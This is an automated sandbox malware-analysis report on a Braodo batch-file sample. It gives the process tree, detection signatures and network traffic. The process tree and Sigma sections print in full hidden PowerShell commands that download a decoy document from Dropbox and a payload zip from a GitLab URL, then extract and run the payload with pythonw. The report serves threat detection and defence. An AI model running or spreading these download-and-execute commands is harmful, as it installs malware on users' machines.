Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hnl2bose13.bat

Overview

General Information

Sample name:hnl2bose13.bat
Analysis ID:1557463
MD5:a004836443420d9b08b715e5757afb5a
SHA1:11a2c48f70ce60ee145cf243173791099212082d
SHA256:6bf5abcdd7110ce950b92f4128c16e52cd2c9401f69955c1b112958ee64bcb0e
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5308 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 2848 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • findstr.exe (PID: 5848 cmdline: fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6960 cmdline: fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 5032 cmdline: fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3492 cmdline: fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 1048 cmdline: fINd MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • find.exe (PID: 4876 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 6116 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5896 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3560 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1584 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3852 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5048 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hnl2bose13.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 5896JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 1584JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_5896.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi64_1584.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_5048.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell DownloadFile
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1584, TargetFilename: C:\Users\Public\Document.zip
              Sigma detected: PowerShell Download Pattern
              Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')", ProcessId: 5896, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T09:56:12.487269+010028033053Unknown Traffic192.168.2.649729172.65.251.78443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://instructorledlearning.dropboxbusiness.com/Avira URL Cloud: Label: phishing
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F14B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb' source: powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2324464767.00000254F1549000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1529000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb" source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1546000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.2212283273.000001F3F17AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.IO.Compression.FileSystem.pdbH source: powershell.exe, 00000010.00000002.2353641518.000002440223A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp
              Source: global trafficHTTP traffic detected: GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /users/sign_in HTTP/1.1Host: gitlab.com
              Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
              Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 172.65.251.78:443
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bosse21/mkt/-/raw/main/12Fukrun.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /users/sign_in HTTP/1.1Host: gitlab.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ct-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; base-uri 'self' ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
